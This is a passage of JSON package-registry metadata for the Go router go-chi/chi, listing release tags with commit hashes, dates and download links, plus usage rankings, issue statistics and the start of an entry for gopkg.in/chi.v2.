ries/go-chi%2Fchi/tags/v5.0.9/manifests"},{"name":"v5.0.8","sha":"da69873df486639c64f3b1f90abf69c943c17554","kind":"commit","published_at":"2022-12-07T13:23:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.8","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.8/manifests"},{"name":"v5.0.7","sha":"0316d5a1df8598eceb137f5f77945be56810b564","kind":"commit","published_at":"2021-11-18T21:56:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.7","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.7/manifests"},{"name":"v5.0.6","sha":"66d6a4d9814d8d8a3816c730e18f5219f263412b","kind":"commit","published_at":"2021-11-15T21:30:54.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.6","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.6/manifests"},{"name":"v5.0.5","sha":"b9a8b9d0a092f57ce4ca3896c40ea36e482c9b6c","kind":"commit","published_at":"2021-10-27T11:12:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.5","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.5/manifests"},{"name":"v5.0.4","sha":"181551d0e5acd337ac7be6f4b7f71e9151c969dc","kind":"commit","published_at":"2021-08-29T14:34:40.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.4","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.4/manifests"},{"name":"v5.0.3","sha":"f16f8704ccc32f63fbc20eb364c41050cf339860","kind":"commit","published_at":"2021-04-29T22:40:05.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.3","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.3/manifests"},{"name":"v5.0.2","sha":"2283e4951adbd82c8f6427117bd6b2a1c315e725","kind":"commit","published_at":"2021-03-25T13:04:21.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.2","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.2/manifests"},{"name":"v5.0.1","sha":"5086f887c59f4c582f871e1de651b6e62e51c377","kind":"commit","published_at":"2021-03-10T12:43:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.1/manifests"},{"name":"v5.0.0","sha":"fe3708ee6c7bf30623c33ca1b8005182c392ff3f","kind":"commit","published_at":"2021-02-28T00:11:55.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.0/manifests"},{"name":"v1.5.4","sha":"c9e87efe9691a63d6a89de8bbd16b04fe4d6640e","kind":"commit","published_at":"2021-02-27T20:52:54.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.4","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.4/manifests"},{"name":"v1.5.3","sha":"7ea741287f73376032e7d4fee8fd6e371313bfa7","kind":"commit","published_at":"2021-02-21T20:28:20.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.3","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"e3bfca4f25703c66c9347e2a430dd88e3198b5f7","kind":"commit","published_at":"2021-02-10T19:44:42.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.2","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"f61ec8cf7c33c662ca78b6b2aac0e68f4729dfd6","kind":"commit","published_at":"2020-12-06T18:50:37.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.1","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"b6287654fc97544b16619d9c6284b0d90d6b2289","kind":"commit","published_at":"2020-11-12T22:54:47.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.0","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.0/manifests"},{"name":"v4.1.2","sha":"86f9a6e7ce9bf453eaa339b51f88f586edbccbc1","kind":"commit","published_at":"2020-06-02T19:02:25.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.2","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.2/manifests"},{"name":"v4.1.1","sha":"1fafc30c1d76663042337e150b02fbacdce3466c","kind":"commit","published_at":"2020-04-16T12:17:06.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"183768ed5df7d0b039500727c380bfbaf9229c81","kind":"commit","published_at":"2020-04-01T19:42:39.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.0/manifests"},{"name":"v4.0.4","sha":"1f2d16707ca3418c2bd151747b5059387fa088ba","kind":"commit","published_at":"2020-03-24T15:11:21.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.4","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.4/manifests"},{"name":"v4.0.3","sha":"2db61557f36b2f4caa20ce6ef50e98bac0f7fce5","kind":"commit","published_at":"2020-01-09T22:01:35.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.3","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.3/manifests"},{"name":"v4.0.2","sha":"da24bba8dcd4021cafac38724bf10dccc97c3e36","kind":"commit","published_at":"2019-02-26T16:20:03.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.2","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.2/manifests"},{"name":"v4.0.1","sha":"1a6bb108ccf279c8dac6f9bad857d773b4f9b421","kind":"commit","published_at":"2019-01-17T22:35:40.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.1","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"e95203758b2a6ec24a8e97124d5719ffe5ec1374","kind":"commit","published_at":"2019-01-10T15:56:14.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.0/manifests"},{"name":"v3.3.4","sha":"08d9051ef6546d57c5dca8eae13e6df362e2d568","kind":"commit","published_at":"2019-01-08T01:17:51.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.4","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.4/manifests"},{"name":"v3.3.3","sha":"b5294d10673813fac8558e7f47242bc9e61b4c25","kind":"commit","published_at":"2018-08-27T20:34:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.3","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.3/manifests"},{"name":"v3.3.2","sha":"e83ac2304db3c50cf03d96a2fcd39009d458bc35","kind":"commit","published_at":"2017-12-22T16:11:33.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.2","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.2/manifests"},{"name":"v3.3.1","sha":"687d2792aedd8e8ac3bbd8592cf55b91d7ea8ce9","kind":"commit","published_at":"2017-11-20T15:19:03.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.1/manifests"},{"name":"v3.3.0","sha":"f7c66f685bcab06bcce78ac212c5f3553c063d19","kind":"commit","published_at":"2017-10-10T22:11:38.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.0/manifests"},{"name":"v3.2.1","sha":"04ec7fc4179604b2390947258f9143eaae23b596","kind":"commit","published_at":"2017-09-01T02:07:29.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.2.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.1/manifests"},{"name":"v3.2.0","sha":"ba73ba0623af32e4e5f09880177e73bd78d98852","kind":"commit","published_at":"2017-08-22T17:58:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.2.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.0/manifests"},{"name":"v3.1.5","sha":"25354a53cca531cb2efd3f1d3c565d90ff04d802","kind":"commit","published_at":"2017-08-02T21:27:05.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.5","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.5/manifests"},{"name":"v3.1.4","sha":"b8567b6442e27704bfeb725095091581cbe82a00","kind":"commit","published_at":"2017-07-27T15:16:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.4","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.4/manifests"},{"name":"v3.1.3","sha":"524a020446146841512dd1639e736422e7af53a4","kind":"commit","published_at":"2017-07-25T17:24:32.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.3","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.3/manifests"},{"name":"v3.1.2","sha":"7e6b856011d49775bb45d829339287a416a85f66","kind":"commit","published_at":"2017-07-24T20:38:22.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.2","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.2/manifests"},{"name":"v3.1.1","sha":"12a98d329f12aac9e94b72c713437350c948a5e2","kind":"commit","published_at":"2017-07-21T14:22:28.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.1/manifests"},{"name":"v3.1.0","sha":"08660a0ad10a8fa7beab3ad43afe66373d49d06a","kind":"commit","published_at":"2017-07-10T19:19:16.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"967844826e58cf31213a7dfb82455d242ad85101","kind":"commit","published_at":"2017-06-21T19:28:24.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.0.0/manifests"},{"name":"v2.1.0","sha":"e6033ea75479391a4bce3918fc119cad31e1cb30","kind":"commit","published_at":"2017-03-30T18:41:17.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.0/manifests"},{"name":"v2.0.0","sha":"54f435d539226571eab1987ed862b1c0fdfdc892","kind":"commit","published_at":"2017-01-06T20:47:52.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.0.0/manifests"},{"name":"v1.0.0","sha":"dcbb8f81eea01aaaa5b6f9bffc229e9e9e0256bb","kind":"commit","published_at":"2016-06-22T21:59:16.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.0.0/manifests"},{"name":"v0.9.0","sha":"c420d7fbf4428b27e31d83591e5e2267d84f9f20","kind":"commit","published_at":"2016-03-31T13:51:57.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v0.9.0","html_url":"https://github.com/go-chi/chi/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v0.9.0/manifests"}]},"repo_metadata_updated_at":"2026-08-08T10:51:35.121Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":6.671005451831473,"dependent_packages_count":6.2526578140658,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":6.461831632948636},"purl":"pkg:golang/github.com/go-%21c%21h%21i/chi/v5","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/go/github.com/go-CHI/chi/v5","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/go/github.com/go-CHI/chi/v5","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/go/github.com/go-CHI/chi/v5/dependencies","status":null,"funding_links":["https://github.com/sponsors/pkieltyka"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-05T21:35:35.662Z","issues_count":173,"pull_requests_count":264,"avg_time_to_close_issue":12477255.268518519,"avg_time_to_close_pull_request":9586229.069148935,"issues_closed_count":108,"pull_requests_closed_count":187,"pull_request_authors_count":141,"issue_authors_count":161,"avg_comments_per_issue":3.098265895953757,"avg_comments_per_pull_request":0.9204545454545454,"merged_pull_requests_count":106,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":13,"past_year_pull_requests_count":81,"past_year_avg_time_to_close_issue":2306211.8,"past_year_avg_time_to_close_pull_request":2561033.4146341463,"past_year_issues_closed_count":10,"past_year_pull_requests_closed_count":41,"past_year_pull_request_authors_count":52,"past_year_issue_authors_count":12,"past_year_avg_comments_per_issue":1.6153846153846154,"past_year_avg_comments_per_pull_request":0.49382716049382713,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":13,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/issues","maintainers":[{"login":"pkieltyka","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pkieltyka"},{"login":"bigwheel","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bigwheel"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-CHI%2Fchi%2Fv5/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-CHI%2Fchi%2Fv5/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-CHI%2Fchi%2Fv5/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-CHI%2Fchi%2Fv5/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-CHI%2Fchi%2Fv5/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-CHI%2Fchi%2Fv5/codemeta","maintainers":[],"registry":{"name":"proxy.golang.org","url":"https://proxy.golang.org","ecosystem":"go","default":true,"packages_count":2263070,"maintainers_count":0,"namespaces_count":837425,"keywords_count":122443,"github":"golang","metadata":{"funded_packages_count":65362,"sync_missing_packages_cursor":{"timestamp":"2026-08-12T00:18:10.975284Z","path":"github.com/fhunleth/muontrap","version":"v0.2.1"},"rate_limit":1},"icon_url":"https://github.com/golang.png","created_at":"2022-04-04T15:19:22.939Z","updated_at":"2026-08-12T12:33:12.528Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/namespaces"}},{"id":4030322,"name":"gopkg.in/chi.v2","ecosystem":"go","description":"Package chi is a small, idiomatic and composable router for building HTTP services.","homepage":"https://github.com/go-chi/chi","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/go-chi/chi","keywords_array":[],"namespace":"gopkg.in","versions_count":3,"first_release_published_at":"2017-01-06T20:47:52.000Z","latest_release_published_at":"2023-09-07T09:44:41.000Z","latest_release_number":"v2.1.1","last_synced_at":"2026-08-12T02:06:18.987Z","created_at":"2022-04-12T09:03:51.093Z","updated_at":"2026-08-12T02:06:18.988Z","registry_url":"https://pkg.go.dev/gopkg.in/chi.v2","install_command":"go get gopkg.in/chi.v2","documentation_url":"https://pkg.go.dev/gopkg.in/chi.v2#section-documentation","metadata":{},"repo_metadata":{"id":37431049,"uuid":"44344606","full_name":"go-chi/chi","owner":"go-chi","description":"lightweight, idiomatic and composable router for building Go HTTP 